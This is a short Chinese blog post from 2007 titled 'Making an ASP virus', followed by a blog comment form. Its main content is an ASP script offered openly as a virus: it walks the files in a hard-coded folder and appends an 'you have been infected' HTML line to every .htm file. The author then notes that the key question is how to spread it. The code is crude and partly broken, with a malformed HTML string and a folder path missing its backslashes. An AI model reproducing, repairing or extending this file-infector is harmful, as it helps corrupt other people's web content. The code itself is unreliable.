ASP病毒的制作

ASP病毒的制作: 

So easy!

<%

Function create()

set fso=server.createobject("scripting.filesystemobject")

set folder=fso.getfolder("c:testfsocool")

for each f in folder.files

%>

<%t=len(f.name)

t1=instrrev(f.name,".")

t2=mid(f.name,t1,t)%>

<%if t2=".htm" then%>

<%

set file=fso.opentextfile("c:testfsocool"&f.name,8)

file.writeline("<html><body 你已经被感染!')></body></html>")

end if

next

End Function

%>

<%call create()%>

关键是怎么传播的问题!!

    A+
发布日期:2007年05月22日  所属分类:未分类

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: